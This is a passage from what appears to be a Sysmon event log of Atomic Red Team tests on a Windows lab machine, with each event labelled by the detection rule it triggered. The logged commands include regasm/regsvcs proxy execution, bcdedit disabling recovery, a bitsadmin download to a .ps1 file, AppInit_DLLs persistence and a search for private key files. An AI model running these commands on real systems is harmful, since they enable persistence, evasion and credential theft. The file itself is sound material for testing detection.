Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ParentProcessId":5800,"ProcessGuid":"747F3D96-D7A3-5D31-0000-0010D2B42900","ProcessId":6176,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:55.694"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3614,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:55.699293Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe\" T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7BB-5D31-0000-0010D5092A00","ProcessId":1060,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:46:19.479"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3619,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:46:19.484316Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence or CredAccess - Lsa NotificationPackge","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Notification Packages","UtcTime":"2019-07-19 14:47:21.917"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3632,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:21.972037Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["New DLL Added to AppInit_DLLs Registry Key"],"event":{"Event":{"EventData":{"Details":"C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D809-5D31-0000-00105C262B00","ProcessId":6056,"RuleName":"Persistence - AppInit","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs","UtcTime":"2019-07-19 14:47:37.136"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3635,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:37.147054Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"EventData":{"CommandLine":"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001064AD2B00","ParentProcessId":6508,"ProcessGuid":"747F3D96-D817-5D31-0000-001097B02B00","ProcessId":396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:47:51.844"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3648,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:51.865963Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"EventData":{"CommandLine":"bcdedit.exe /set {default} recoveryenabled no","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} recoveryenabled no\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001049B42B00","ParentProcessId":6216,"ProcessGuid":"747F3D96-D817-5D31-0000-0010B7B62B00","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:47:51.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3650,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:52.010791Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D824-5D31-0000-001023F42B00","ParentProcessId":6736,"ProcessGuid":"747F3D96-D824-5D31-0000-001075F62B00","ProcessId":1540,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:04.122"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3655,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:04.131410Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D83E-5D31-0000-0010A2D72E00","ParentProcessId":4036,"ProcessGuid":"747F3D96-D83E-5D31-0000-0010AAD92E00","ProcessId":3732,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:30.796"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3660,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:30.807486Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ProcessId":888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3677,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.524876Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c:\\ /b /s .key \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-001045922F00","ProcessId":6220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3678,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.557947Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"findstr /e .key","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Find String (QGREP) Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=393F2422D22079BFB0022598D70BEB294F2024F4,MD5=DC0816790EFA08AA5B55C1EECFDDB525,SHA256=750AB5E1F3EB18CC42A4A4C7BAB27753F6B26FB9752AD3861833753091044281,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F","Image":"C:\\Windows\\System32\\findstr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-00109E932F00","ProcessId":948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3679,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.570057Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E83B3100","ParentProcessId":2888,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010413E3100","ProcessId":5348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.176"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3682,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.180586Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3683,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.227372Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ParentProcessId":5984,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010CC423100","ProcessId":5256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3684,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.249442Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ProcessId":5016,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.284"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3685,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.304938Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ParentProcessId":5016,"ProcessGuid":"747F3D96-D87C-5D31-0000-00105B473100","ProcessId":6208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3686,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.335446Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query 